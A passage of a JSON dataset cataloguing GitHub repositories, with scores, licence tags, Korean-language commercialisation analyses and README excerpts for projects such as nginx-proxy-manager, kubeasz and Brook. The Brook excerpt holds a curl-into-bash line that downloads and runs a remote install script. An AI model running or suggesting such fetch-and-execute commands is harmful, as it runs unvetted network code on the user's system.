[nbnhhsh.user.js](https://github.com/itorr/nbnhhsh/raw/master/nbnhhsh.user.js) 完成脚本安装\n\n>脚本版本目前会在 **微博**、**贴吧**、**哔哩哔哩** 页面下运行，划词时会提交所选文字以用于转义。\n\n\n## 用户脚本是什么？\n用户脚本是一段代码，它们能够优化您的网页浏览体验。安装之后，有些脚本能为网站添加新的功能，有些能使网站的界面更加易用，有些则能隐藏网站上烦人的部分内容。用户脚本都是由用户编写并向全世界发表的，您可以免费安装，轻松体验。\n\n安装过程可参考 [https://greasyfork.org/](https://greasyfork.org/zh-CN/#home-step-1) 首页的，**第一步：安装一个用户脚本管理器** 章节\n\n\n## 如何在更多网站上使用这个用户脚本？\n在对应的用户脚本配置里可以设置 **用户匹配**，添加对应 URL 规则即可。\t\n\n## 贡献词条\n在每一个词条右上角都有 `+` 图标的按钮，点击可以提交对应文字，审核后会整理录入。\n\n## 错误词条反馈\n通过 issue 反馈 [#122](https://github.com/itorr/nbnhhsh/issues/122)\n\n## 有更离谱的例文？\n请用任意方式发我！😖\n\n## 给个人网站添加划词转义？\n在需要划词转义的页面 `</body>` 前添加如下代码即可。\n```HTML\n<script src=\"https://cdn.bootcss.com/vue/2.6.11/vue.min.js\"></script>\n<script src=\"nbnhhsh.user.js\"></script>\n```\n\n## 衍生版本\n[Quicker 动作](https://getquicker.net/Sharedaction?code=db166bab-e912-4","composite_score":0.1529,"license_safety_tag":"safe"},{"name":"adamgiebl/neumorphism","github_url":"https://github.com/adamgiebl/neumorphism","stars":9,"language":"JavaScript","license":"BSD-3-Clause","abandonment_months":7,"description":"# Neumorphism 저장소 분석\n\n## 왜 보물인가\n부드럽고 세련된 디자인 스타일을 쉽게 만들 수 있는 도구로, 현대적인 앱과 웹사이트의 외관을 빠르게 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 프로젝트 관리나 협업 도구의 UI 개선으로 사용자 만족도 증대\n- **내부 업무 도구**: 기업의 직원 관리 시스템이나 보고","readme_excerpt":"<p align=\"center\"><img src=\"./public/android-chrome-512x512.png\" width=\"200\"></p>\n\n# Neumorphism.io\n\nCSS code generator for a new popular design trend called Neumorphism/Soft UI. I hope this will help designers and developers experiment with it and possibly adapt it. Built with React.js\n\nContributions are welcome.\n\n:link: [Live version](https://neumorphism.io/)\n\n## Installation\n\n### Dependencies\n\n```\nnpm install\n```\n\nor \n\n```\nyarn install\n```\n\n### Running the project\n\nIn the project directory, you can run:\n\n```\nnpm start\n```\n\nor \n\n```\nyarn start\n```\n\nRuns the app in the development mode.<br />\nOpen [http://localhost:3000](http://localhost:3000) to view it in the browser.\n\nThe page will reload if you make edits.<br />\nYou will also see any lint errors in the console.\n","composite_score":0.1529,"license_safety_tag":"safe"},{"name":"telekons/one-more-re-nightmare","github_url":"https://github.com/telekons/one-more-re-nightmare","stars":16,"language":"Common Lisp","license":"BSD-2-Clause","abandonment_months":8,"description":"# telekons/one-more-re-nightmare 분석\n\n## 왜 보물인가\n정규표현식(복잡한 문자 패턴 검색 도구)의 버그를 찾고 수정하는 전문 솔루션으로, 많은 소프트웨어에서 필수적인 부분의 안정성을 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **코드 검증 SaaS**: 개발자들이 작성한 패턴이 안전한지 자동으로 검사해주는 웹 서비스\n2","readme_excerpt":"# one-more-re-nightmare\n\none-more-re-nightmare is a regular expression engine that uses the\ntechnique presented in [Regular-expression derivatives\nrevisited](https://www.ccs.neu.edu/home/turon/re-deriv.pdf) to\ninterpret and compile regular expressions. We use a few tricks to make\nmatching quite fast:\n\n- We use a deterministic finite automaton to have O(n) runtime.\n- We run the Common Lisp compiler to generate machine code, rather\n  than interpreting a DFA or bytecode, or jumping through closures\n  (like CL-PPCRE does).\n- We generate specialised code for each array type, so everything is\n  inlined.\n- If you use the `one-more-re-nightmare-simd` system on SBCL 2.1.10 or\n  newer with AVX2, we even use vectorised scanning of constant\n  prefixes of regular expressions.\n\nThanks to Gilbert Baumann for suggesting I use derivatives to compile\nregular expressions, and then for informing me of how to handle\nsubmatching properly, and my discrete mathematics teachers for\nformally introducing me to f","composite_score":0.1527,"license_safety_tag":"safe"},{"name":"AnalyticalGraphicsInc/cesium","github_url":"https://github.com/AnalyticalGraphicsInc/cesium","stars":5,"language":"JavaScript","license":"apache-2.0","abandonment_months":0,"description":"# Cesium 저장소 분석\n\n## 왜 보물인가\n지구를 3D로 보고 조작할 수 있는 강력한 기술로, 지도·위성 데이터·건설 계획 같은 지리 정보를 누구나 쉽게 시각화할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 부동산 플랫폼**\n- 건물의 위치를 3D 지도에서 보여주고 주변 환경을 한눈에 파악하게 하는 부동산 중개 서비스\n\n**2","readme_excerpt":"# CesiumJS\n\n[![Build Status](https://github.com/CesiumGS/cesium/actions/workflows/dev.yml/badge.svg)](https://github.com/CesiumGS/cesium/actions/workflows/dev.yml)\n[![npm](https://img.shields.io/npm/v/cesium)](https://www.npmjs.com/package/cesium)\n[![Docs](https://img.shields.io/badge/docs-online-orange.svg)](https://cesium.com/learn/)\n\n![Cesium](https://github.com/CesiumGS/cesium/wiki/logos/Cesium_Logo_Color.jpg)\n\nCesiumJS is a JavaScript library for creating 3D globes and 2D maps in a web browser without a plugin. It uses WebGL for hardware-accelerated graphics, and is cross-platform, cross-browser, and tuned for dynamic-data visualization.\n\nBuilt on open formats, CesiumJS is designed for robust interoperability and scaling for massive datasets.\n\n---\n\n[**Examples**](https://sandcastle.cesium.com/) :earth_asia: [**Docs**](https://cesium.com/learn/cesiumjs-learn/) :earth_americas: [**Website**](https://cesium.com/cesiumjs) :earth_africa: [**Forum**](https://community.cesium.com/) :eart","composite_score":0.1522,"license_safety_tag":"safe"},{"name":"sindresorhus/sort-on","github_url":"https://github.com/sindresorhus/sort-on","stars":11,"language":"JavaScript","license":"mit","abandonment_months":8,"description":"# sort-on 저장소 분석\n\n## 왜 보물인가\n데이터를 원하는 기준에 따라 자동으로 정렬해주는 작은 도구로, 개발자가 반복적인 정렬 코드를 작성할 필요가 없게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. 전자상거래 플랫폼 (SaaS)**\n- 상품 목록을 가격, 인기도, 최신순으로 정렬하는 필터 기능에 활용\n\n**2. 팀 협업 도구 (내부 업무 도구)","readme_excerpt":"# sort-on\n\n> Sort an array on an object property\n\n## Install\n\n```sh\nnpm install sort-on\n```\n\n## Usage\n\n```js\nimport sortOn from 'sort-on';\n\n// Sort by an object property\nsortOn([{x: 'b'}, {x: 'a'}, {x: 'c'}], 'x');\n//=> [{x: 'a'}, {x: 'b'}, {x: 'c'}]\n\n// Sort descending by an object property\nsortOn([{x: 'b'}, {x: 'a'}, {x: 'c'}], '-x');\n//=> [{x: 'c'}, {x: 'b'}, {x: 'a'}]\n\n// Sort by a nested object property\nsortOn([{x: {y: 'b'}}, {x: {y: 'a'}}], 'x.y');\n//=> [{x: {y: 'a'}}, {x: {y: 'b'}}]\n\n// Sort descending by a nested object property\nsortOn([{x: {y: 'b'}}, {x: {y: 'a'}}], '-x.y');\n//=> [{x: {y: 'b'}}, {x: {y: 'a'}}]\n\n// Sort by the `x` property, then `y`\nsortOn([{x: 'c', y: 'c'}, {x: 'b', y: 'a'}, {x: 'b', y: 'b'}], ['x', 'y']);\n//=> [{x: 'b', y: 'a'}, {x: 'b', y: 'b'}, {x: 'c', y: 'c'}]\n\n// Sort by the returned value\nsortOn([{x: 'b'}, {x: 'a'}, {x: 'c'}], element => element.x);\n//=> [{x: 'a'}, {x: 'b'}, {x: 'c'}]\n```\n\n## API\n\n### sortOn(array, property, options)\n\nReturns a new sort","composite_score":0.1521,"license_safety_tag":"safe"},{"name":"PalisadoesFoundation/talawa-admin","github_url":"https://github.com/PalisadoesFoundation/talawa-admin","stars":262,"language":"TypeScript","license":"GPL-3.0","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.152,"license_safety_tag":"restricted"},{"name":"jc21/nginx-proxy-manager","github_url":"https://github.com/jc21/nginx-proxy-manager","stars":7,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# Nginx Proxy Manager 상용화 분석\n\n## 왜 보물인가\n웹사이트를 쉽게 관리할 수 있는 중간 관리자 역할을 하는 도구로, 기술 지식 없이도 여러 사이트의 보안과 속도를 한 곳에서 제어할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **웹호스팅 SaaS**: 고객들이 자신의 웹사이트를 쉽게 온라인에 띄우고 관리하는 플랫폼으로 제공\n2. **","readme_excerpt":"<p align=\"center\">\n\t<img src=\"https://nginxproxymanager.com/github.png\">\n\t<br><br>\n\t<img src=\"https://img.shields.io/badge/version-2.14.0-green.svg?style=for-the-badge\">\n\t<a href=\"https://hub.docker.com/repository/docker/jc21/nginx-proxy-manager\">\n\t\t<img src=\"https://img.shields.io/docker/stars/jc21/nginx-proxy-manager.svg?style=for-the-badge\">\n\t</a>\n\t<a href=\"https://hub.docker.com/repository/docker/jc21/nginx-proxy-manager\">\n\t\t<img src=\"https://img.shields.io/docker/pulls/jc21/nginx-proxy-manager.svg?style=for-the-badge\">\n\t</a>\n</p>\n\nThis project comes as a pre-built Docker image that enables you to easily forward to your websites\nrunning at home or otherwise, including free SSL, without having to know too much about Nginx or Letsencrypt.\n\n- [Quick Setup](#quick-setup)\n- [Full Setup](https://nginxproxymanager.com/setup/)\n- [Screenshots](https://nginxproxymanager.com/screenshots/)\n\n## Project Goal\n\nI created this project to fill a personal need to provide users with an easy way to acc","composite_score":0.1519,"license_safety_tag":"safe"},{"name":"gjmzj/kubeasz","github_url":"https://github.com/gjmzj/kubeasz","stars":5,"language":"Jinja","license":"unknown","abandonment_months":1,"description":"# kubeasz 저장소 분석\n\n## 왜 보물인가\n쿠버네티스(클라우드 시스템의 중추)를 일반 기업도 쉽게 구축할 수 있도록 자동화한 도구로, 복잡한 기술을 단순화했다는 점이 핵심입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 스타트업이 별도 개발 없이 자사 서비스를 클라우드에 올릴 수 있는 설치형 솔루션으로 판매\n2. **내부 업무 ","readme_excerpt":"<img alt=\"kubeasz-logo\" width=\"320\" height=\"100\" src=\"docs/pics/kubeasz.svg\">  <a href=\"docs/mixes/conformance.md\"><img align=\"right\" alt=\"conformance-icon\" width=\"75\" height=\"100\" src=\"https://www.cncf.io/wp-content/uploads/2020/07/certified_kubernetes_color-1.png\"></a>\n\n**kubeasz** 致力于提供快速部署高可用`k8s`集群的工具, 同时也努力成为`k8s`实践、使用的参考书；基于二进制方式部署和利用`ansible-playbook`实现自动化；既提供一键安装脚本, 也可以根据`安装指南`分步执行安装各个组件。\n\n**kubeasz** 从每一个单独部件组装到完整的集群，提供最灵活的配置能力，几乎可以设置任何组件的任何参数；同时又为集群创建预置一套运行良好的默认配置，甚至自动化创建适合大规模集群的[BGP Route Reflector网络模式](docs/setup/network-plugin/calico-bgp-rr.md)。\n\n- **集群特性** [Master高可用](docs/setup/00-planning_and_overall_intro.md#ha-architecture)、[离线安装](docs/setup/offline_install.md)、[多架构支持(amd64/arm64)](docs/setup/multi_platform.md)\n- **集群版本** kubernetes v1.24, v1.25, v1.26, v1.27, v1.28, v1.29, v1.30, v1.31, v1.32, v.1.33, v1.34, v1.35\n- **运行时** [containerd](docs/setup/03-container_runtime.md) v1.7.x, v2.0.x, v2.1.x\n- **网络** [calico](docs/setup/network-plugin/calico.md), [cilium](docs/se","composite_score":0.1515,"license_safety_tag":"unknown"},{"name":"druid-io/druid","github_url":"https://github.com/druid-io/druid","stars":8,"language":"Java","license":"apache-2.0","abandonment_months":0,"description":"# Druid 저장소 분석\n\n## 왜 보물인가\n대규모 데이터를 빠르게 분석하는 기업용 시스템으로, 데이터 기반 의사결정이 필요한 기업들이 매우 선호합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 분석 대시보드**: 고객사의 매출, 사용자 행동 등을 실시간으로 보여주는 구독형 분석 서비스\n2. **내부 업무 도구**: 대기업의 영업팀이 매일 마감 현황을","readme_excerpt":"<!--\n  ~ Licensed to the Apache Software Foundation (ASF) under one\n  ~ or more contributor license agreements.  See the NOTICE file\n  ~ distributed with this work for additional information\n  ~ regarding copyright ownership.  The ASF licenses this file\n  ~ to you under the Apache License, Version 2.0 (the\n  ~ \"License\"); you may not use this file except in compliance\n  ~ with the License.  You may obtain a copy of the License at\n  ~\n  ~   http://www.apache.org/licenses/LICENSE-2.0\n  ~\n  ~ Unless required by applicable law or agreed to in writing,\n  ~ software distributed under the License is distributed on an\n  ~ \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n  ~ KIND, either express or implied.  See the License for the\n  ~ specific language governing permissions and limitations\n  ~ under the License.\n  -->\n\n[![Coverage Status](https://img.shields.io/codecov/c/gh/apache/druid?logo=codecov)](https://codecov.io/gh/apache/druid)\n[![Docker](https://img.shields.io/badge/container-d","composite_score":0.1515,"license_safety_tag":"safe"},{"name":"TrashUwU/PokeAssistant","github_url":"https://github.com/TrashUwU/PokeAssistant","stars":8,"language":"Ruby","license":"unknown","abandonment_months":7,"description":"# PokeAssistant 상용화 분석\n\n## 왜 보물인가\n포켓몬 게임 팬들이 자주 찾는 정보(포켓몬 능력치, 최적 조합 등)를 자동으로 제공해주는 도구로, 게임 커뮤니티에서 꾸준한 수요가 있습니다.\n\n## 어디에 쓸 수 있나\n1. **포켓몬 공략 웹사이트 SaaS**: 게임 초보자 대상 유료 구독형 가이드 서비스\n2. **게임 스트리머 지원 도구**: ","readme_excerpt":"![](https://media.discordapp.net/attachments/714908291641376810/868701576183820298/PokeAssistant_3.png?width=700&height=100)\n\n[![Version](https://img.shields.io/badge/Version-4.0.0-%2325d60b?logo=visual-studio-code&style=for-the-badge)](https://github.com/TrashUwU/PokeAssistant/releases) [![Forks](https://img.shields.io/endpoint?style=for-the-badge&url=https%3A%2F%2Fcoffee.buttertaurus.repl.co%2Fforks)](https://replit.com/@ButterTaurus/PokeAssistant) [![Premium](https://img.shields.io/badge/premium%20users-73-%23FF8C00?logo=github&style=for-the-badge)](https://github.com/TrashUwU/PokeAssistant/#features) [![Discord](https://img.shields.io/endpoint?style=for-the-badge&url=https%3A%2F%2Fcoffee.buttertaurus.repl.co%2Fdiscord)](https://discord.gg/CtXvFj9yPq)\n\n# PokéAssistant\n\nAmazing Pokétwo Assistant Bot that pings you if legendary or mythical spawns, and other features Eg. SH Ping, Quest Ping, Anti-Snipe and more! **It's a forked and improved version of [Chamburr](https://github.com/cham","composite_score":0.1513,"license_safety_tag":"unknown"},{"name":"parrt/dtreeviz","github_url":"https://github.com/parrt/dtreeviz","stars":6,"language":"Jupyter Notebook","license":"mit","abandonment_months":5,"description":"# parrt/dtreeviz 분석 보고서\n\n## 왜 보물인가\n복잡한 데이터 구조를 시각적으로 아름답게 표현해주는 도구로, 데이터 분석가나 학생들이 머신러닝 모델의 동작 원리를 직관적으로 이해할 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 교육용 SaaS 플랫폼**\n데이터 과학 온라인 강의 플랫폼에서 학생들이 인공지능 알고리즘을 시각적으로 학습","readme_excerpt":"# dtreeviz : Decision Tree Visualization\n\n## Description\n\nA python library for decision tree visualization and model interpretation.  Decision trees are the fundamental building block of [gradient boosting machines](http://explained.ai/gradient-boosting/index.html) and [Random Forests](https://en.wikipedia.org/wiki/Random_forest)(tm), probably the two most popular machine learning models for structured data.  Visualizing decision trees is a tremendous aid when learning how these models work and when interpreting models. The visualizations are inspired by an educational animation by [R2D3](http://www.r2d3.us/); [A visual introduction to machine learning](http://www.r2d3.us/visual-intro-to-machine-learning-part-1/). Please see [How to visualize decision trees](http://explained.ai/decision-tree-viz/index.html) for deeper discussion of our decision tree visualization library and the visual design decisions we made.\n\nCurrently dtreeviz supports: [scikit-learn](https://scikit-learn.org/stabl","composite_score":0.151,"license_safety_tag":"safe"},{"name":"naver/pinpoint","github_url":"https://github.com/naver/pinpoint","stars":9,"language":"Java","license":"apache-2.0","abandonment_months":0,"description":"# Naver Pinpoint 저장소 분석\n\n## 왜 보물인가\n회사 시스템이 제대로 작동하는지 실시간으로 감시하고 문제를 찾아주는 기술로, 수천 개의 서버를 관리하는 대규모 기업에게 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 기업용 모니터링 SaaS 서비스**\n- 중소 소프트웨어 회사들이 자신의 애플리케이션 상태를 24시간 모니터링하는 클라우드 서","readme_excerpt":"\n\n![Pinpoint](web/psd/logo.png)\n\n[![Maven](https://img.shields.io/github/actions/workflow/status/pinpoint-apm/pinpoint/maven.yml?branch=master&label=build&logo=github)](https://github.com/pinpoint-apm/pinpoint/actions?query=workflow%3AMaven)\n[![codecov](https://codecov.io/gh/pinpoint-apm/pinpoint/branch/master/graph/badge.svg)](https://codecov.io/gh/pinpoint-apm/pinpoint)\n\n## Latest Release (2026/04/02)\n\nWe're happy to announce the release of Pinpoint v3.0.5.\nPlease check the release note at (https://github.com/pinpoint-apm/pinpoint/releases/tag/v3.0.5).\n\nThe current stable version is [v3.0.5](https://github.com/pinpoint-apm/pinpoint/releases/tag/v3.0.5).\n\n## Live Demo\n\nTake a quick look at Pinpoint with our [demo](http://223.130.142.103:8080/main/ApiGateway@SPRING_BOOT/5m?inbound=1&outbound=4&wasOnly=false&bidirectional=false)!\n\n## PHP, PYTHON\n\nPinpoint also supports application written in PHP, Python. [Check-out our agent repository](https://github.com/pinpoint-apm/pinpoint-c-agent).","composite_score":0.1506,"license_safety_tag":"safe"},{"name":"PyTorchLightning/pytorch-lightning","github_url":"https://github.com/PyTorchLightning/pytorch-lightning","stars":17,"language":"Python","license":"Apache-2.0","abandonment_months":0,"description":"# PyTorch Lightning 비즈니스 분석\n\n## 왜 보물인가\n인공지능 모델 학습을 간단하게 만드는 오픈소스 도구로, 복잡한 프로그래밍 없이도 AI를 활용할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **AI 학습 자동화 SaaS**: 기업의 데이터를 업로드하면 자동으로 예측 모델을 만들어주는 웹 서비스\n2. **기업용 AI 도구**: 마케","readme_excerpt":"<div align=\"center\">\n\n<img alt=\"Lightning\" src=\"https://pl-bolts-doc-images.s3.us-east-2.amazonaws.com/app-2/ptl_banner.png\" width=\"800px\" style=\"max-width: 100%;\">\n\n<br/>\n<br/>\n\n**The deep learning framework to pretrain and finetune AI models.**\n\n**Serving models?** Use [LitServe](https://github.com/Lightning-AI/litserve?utm_source=ptl_readme&utm_medium=referral&utm_campaign=ptl_readme) to build custom inference servers in pure Python.\n\n______________________________________________________________________\n\n<p align=\"center\">\n    <a href=\"#quick-start\" style=\"margin: 0 10px;\">Quick start</a> •\n  <a href=\"#examples\">Examples</a> •\n  <a href=\"#why-pytorch-lightning\">PyTorch Lightning</a> •\n  <a href=\"#lightning-fabric-expert-control\">Fabric</a> •\n  <a href=\"https://lightning.ai/?utm_source=ptl_readme&utm_medium=referral&utm_campaign=ptl_readme\">Lightning Cloud</a> •   \n  <a href=\"#community\">Community</a> •\n  <a href=\"https://pytorch-lightning.readthedocs.io/en/stable/\">Docs</a>\n</p>\n\n<","composite_score":0.1506,"license_safety_tag":"safe"},{"name":"TeXitoi/keyberon","github_url":"https://github.com/TeXitoi/keyberon","stars":5,"language":"Rust","license":"MIT","abandonment_months":7,"description":"# TeXitoi/keyberon 분석\n\n## 왜 보물인가\n맞춤형 키보드를 직접 만들 수 있는 오픈소스 소프트웨어로, 하드웨어 제조사들이 복잡한 키보드 기능을 쉽게 구현할 수 있도록 돕습니다.\n\n## 어디에 쓸 수 있나\n1. **게이밍 주변기기 제조사의 SaaS**: 소비자가 온라인에서 자신의 게이밍 키보드 설정을 커스터마이징하고 저장하는 웹 서비스\n2. ","readme_excerpt":"# Keyberon [![Build status](https://travis-ci.org/TeXitoi/keyberon.svg?branch=master)](https://travis-ci.org/TeXitoi/keyberon) [![](https://img.shields.io/crates/v/keyberon.svg)](https://crates.io/crates/keyberon) [![](https://docs.rs/keyberon/badge.svg)](https://docs.rs/keyberon)\n\nA rust crate to create a pure rust keyboard firmware.\n\nIt is exposed as a library giving you the different building blocks to\ncreate a featureful keyboard firmware. As the different functionality\nare interconected by the user of the crate, you can use only the parts\nyou are interested in or easily insert your own code in between.\n\nThis crate is a no_std crate, running on stable rust. To use it on a\ngiven MCU, you need GPIO throw the [embedded hal\ncrate](https://crates.io/crates/embedded-hal) to read the key states,\nand the [usb-device crate](https://crates.io/crates/usb-device) for\nUSB communication.\n\n## Projects using this firmware\n\n[List of Repositories using Keyberon](./KEYBOARDS.md)\n\nThe first project us","composite_score":0.1506,"license_safety_tag":"safe"},{"name":"txthinking/brook","github_url":"https://github.com/txthinking/brook","stars":5,"language":"Go","license":"gpl-3.0","abandonment_months":3,"description":"# Brook 저장소 분석\n\n## 왜 보물인가\n인터넷 연결을 안전하고 빠르게 우회하는 오픈소스 도구로, 개인정보 보호가 중요한 사용자들 사이에서 꾸준한 관심을 받고 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 개인정보 보호 특화 VPN/프록시 관리 플랫폼으로 월 구독료 모델 운영\n- **내부 업무 도구**: 대기업의 보안팀이 직원 네트","readme_excerpt":"# Brook\n\nA cross-platform programmable network tool.\n\n**Sponsor**: [Shiliew - Focuses on providing stable network services](https://www.txthinking.com/shiliew.html)\n\n## Server\n\n```\nbash <(curl https://bash.ooo/nami.sh)\n```\n\n```\nnami install brook\n```\n\n```\nbrook server -l :9999 -p hello\n```\n\n## Client\n\n- [iOS](https://apps.apple.com/us/app/brook-network-tool/id1216002642)\n- [Android](https://github.com/txthinking/brook/releases/latest/download/Brook.apk)\n- [macOS](https://apps.apple.com/us/app/brook-network-tool/id1216002642)\n\t- [About App Mode on macOS](https://www.txthinking.com/talks/articles/macos-app-mode-en.article)\n- [Windows](https://github.com/txthinking/brook/releases/latest/download/Brook.msix)\n- [Linux](https://github.com/txthinking/brook/releases/latest/download/Brook.bin)\n\t- [How to install Brook on Linux](https://www.txthinking.com/talks/articles/linux-app-brook-en.article)\n- [OpenWrt](https://www.txthinking.com/talks/articles/brook-openwrt-one-en.article)\n\n> You may want","composite_score":0.1505,"license_safety_tag":"restricted"},{"name":"actions/virtual-environments","github_url":"https://github.com/actions/virtual-environments","stars":7,"language":"PowerShell","license":"MIT","abandonment_months":0,"description":"# actions/virtual-environments 분석\n\n## 왜 보물인가\n소프트웨어 개발자들이 코드를 테스트하는 과정을 자동화해주는 도구로, 반복적인 작업을 없애 개발 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자 협업 플랫폼에서 고객의 코드를 안전하게 자동 테스트하는 기능 제공\n2. **내부 업무","readme_excerpt":"# GitHub Actions Runner Images\n\n**Table of Contents**\n\n- [About](#about)\n- [Available Images](#available-images)\n- [Announcements](#announcements)\n- [Image Definitions](#image-definitions)\n- [Image Releases](#image-releases)\n- [Software and Image Support](#software-and-image-support)\n- [How to Interact with the Repo](#how-to-interact-with-the-repo)\n- [FAQs](#faqs)\n\n## About\n\nThis repository contains the source code used to create the VM images for [GitHub-hosted runners](https://docs.github.com/en/actions/using-github-hosted-runners/about-github-hosted-runners) used for Actions, as well as for [Microsoft-hosted agents](https://docs.microsoft.com/en-us/azure/devops/pipelines/agents/hosted?view=azure-devops#use-a-microsoft-hosted-agent) used for Azure Pipelines.\nTo build a VM machine from this repo's source, see the [instructions](docs/create-image-and-azure-resources.md).\n\n## Available Images\n\n| Image | Architecture | YAML Label | Included Software |\n| --------------------|-------------","composite_score":0.1504,"license_safety_tag":"safe"},{"name":"lorenwest/node-config","github_url":"https://github.com/lorenwest/node-config","stars":7,"language":"JavaScript","license":"NOASSERTION","abandonment_months":2,"description":"# node-config 상용화 분석\n\n## 왜 보물인가\n프로그램 설정을 쉽게 관리할 수 있는 도구로, 복잡한 소프트웨어를 만드는 회사들이 반복적으로 구매하는 핵심 부품입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객사별로 다른 설정을 자동으로 적용하는 다중 테넌트 플랫폼\n2. **내부 업무 도구**: 개발팀이 환경(테스트/실제)별로 ","readme_excerpt":"Configure your Node.js Applications\n===================================\n\n[![npm package](https://img.shields.io/npm/v/config)](https://www.npmjs.com/package/config)\n[![Downloads](https://img.shields.io/npm/dt/config)](https://www.npmjs.com/package/config)\n[![Issues](https://img.shields.io/github/issues/node-config/node-config)](https://github.com/node-config/node-config/issues)\n\n[Release Notes](https://github.com/node-config/node-config/releases)\n\nIntroduction\n------------\n\nNode-config organizes hierarchical configurations for your app deployments.\n\nIt lets you define a set of default parameters,\nand extend them for different deployment environments (development, qa,\nstaging, production, etc.).\n\nConfigurations are stored in [configuration files](https://github.com/node-config/node-config/wiki/Configuration-Files) within your application, and can be overridden and extended by [environment variables](https://github.com/lorenwest/node-config/wiki/Environment-Variables),\n [command line par","composite_score":0.1503,"license_safety_tag":"unknown"},{"name":"openscrm/api-server","github_url":"https://github.com/openscrm/api-server","stars":81,"language":"Go","license":"Apache-2.0","abandonment_months":7,"description":"# OpenSCRM API Server 평가 보고서\n\n## 왜 보물인가\n고객 관리 시스템의 핵심 엔진을 제공하여, 중소 기업들이 값비싼 영업 관리 소프트웨어를 직접 구축할 수 있게 만드는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스타트업이 이 기술을 기반으로 \"우리 회사만의 고객 관리 앱\"을 만들어 월 구독료로 판매\n2. **내","readme_excerpt":"<h4 align=\"center\">\n重要：本项目缺乏维护，目前没有力量继续维护，如果有兴趣维护的朋友，可以联系我，我会尽力提供帮助。\n</h4>\n\n\n<p align=\"center\">\n  <img alt=\"logo\" height=\"48\" src=\"https://openscrm.oss-cn-hangzhou.aliyuncs.com/public/openscrm_logo.svg\">\n</p>\n\n<h3 align=\"center\">\n安全，强大，易开发的企业微信SCRM\n</h3>\n\n<h4 align=\"center\">\n\n<a href=\"https://github.com/openscrm/api-server/wiki\" target=\"_blank\">文档</a> |\n[截图](#项目截图) |\n<a href=\"http://dashboard.demo.openscrm.cn:8000/\" target=\"_blank\">演示</a> |\n<a href=\"https://github.com/openscrm/api-server/wiki/%E5%AE%89%E8%A3%85%E6%95%99%E7%A8%8B\" target=\"_blank\">安装</a> \n\n</h4>\n\n<p align=\"center\">\n  <img width=\"260\" src=\"https://openscrm.oss-cn-hangzhou.aliyuncs.com/public/感谢赞助.svg\">\n</p>\n\n### 项目简介\n> OpenSCRM是一套基于**Go**和**React**的**高质量**企业微信私域流量管理系统\n\n### 快速开始，启动演示项目（docker-compose）\n我们依靠docker-compose启动mysql和redis。\napi-server后端API本地编译启动，\ndashboard前端界面同样本地编译启动\n\n#### 启动mysql和redis\ndocker-compose up\n\n#### 启动api-server\n* conf/config.example.yaml -> conf/config.yaml // 修改SuperAdmin字段就行了，其他的跑起来再改\n* 项目根目录下启动 go","composite_score":0.1501,"license_safety_tag":"safe"},{"name":"facebook/fresco","github_url":"https://github.com/facebook/fresco","stars":5,"language":"Java","license":"mit","abandonment_months":0,"description":"# Facebook Fresco 분석\n\n## 왜 보물인가\n스마트폰에서 사진을 빠르고 효율적으로 불러오고 표시하는 기술로, 모바일 앱의 사용자 경험을 크게 향상시킬 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **사진 공유 SaaS**: 인스타그램 같은 사진 중심 서비스에서 빠른 이미지 로딩으로 사용자 만족도 향상\n2. **전자상거래 내부 도구**: 온라인","readme_excerpt":"# Fresco\n\n<img alt=\"Fresco Logo\" align=\"right\" src=\"docs/static/sample-images/fresco_logo.svg\" width=\"15%\" />\n\n[![Build Status](https://github.com/facebook/fresco/actions/workflows/build.yml/badge.svg?event=push)](https://github.com/facebook/fresco/actions/workflows/build.yml?query=event%3Apush)\n[![License](https://img.shields.io/badge/license-MIT-brightgreen)](https://github.com/facebook/fresco/blob/main/LICENSE)\n\nFresco is a powerful system for displaying images in Android applications.\n\nFresco takes care of image loading and display, so you don't have to. It will load images from the network, local storage, or local resources, and display a placeholder until the image has arrived. It has two levels of cache; one in memory and another in internal storage.\n\nIn Android 4.x and lower, Fresco puts images in a special region of Android memory. This lets your application run faster - and suffer the dreaded `OutOfMemoryError` much less often.\n\nFresco also supports:\n\n* streaming of progressi","composite_score":0.1498,"license_safety_tag":"safe"},{"name":"coelckers/gzdoom","github_url":"https://github.com/coelckers/gzdoom","stars":5,"language":"C++","license":"GPL-3.0","abandonment_months":6,"description":"# GZDoom 저장소 분석\n\n## 왜 보물인가\n1990년대 게임을 현대 컴퓨터에서 즐길 수 있게 만들어주는 오픈소스 프로젝트로, 수십 년간 게이머들에게 사랑받는 핵심 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n1. **레트로 게임 스트리밍 플랫폼**: 클라우드에서 클래식 게임을 즉시 플레이할 수 있는 구독 서비스\n2. **게임 보관소 API**: 박물관이","readme_excerpt":"# Welcome to GZDoom!\n\n[![Continuous Integration](https://github.com/ZDoom/gzdoom/actions/workflows/continuous_integration.yml/badge.svg)](https://github.com/ZDoom/gzdoom/actions/workflows/continuous_integration.yml)\n\n## GZDoom is a modder-friendly OpenGL and Vulkan source port based on the DOOM engine\n\nCopyright (c) 1998-2025 ZDoom + GZDoom teams, and contributors\n\nDoom Source (c) 1997 id Software, Raven Software, and contributors\n\nPlease see license files for individual contributor licenses\n\nSpecial thanks to Coraline of the EDGE team for allowing us to use her [README.md](https://github.com/3dfxdev/EDGE/blob/master/README.md) as a template for this one.\n\n### Source code licensed under the GPL v3\n##### https://www.gnu.org/licenses/quick-guide-gplv3.en.html\n---\n\n## How to build GZDoom\n\nTo build 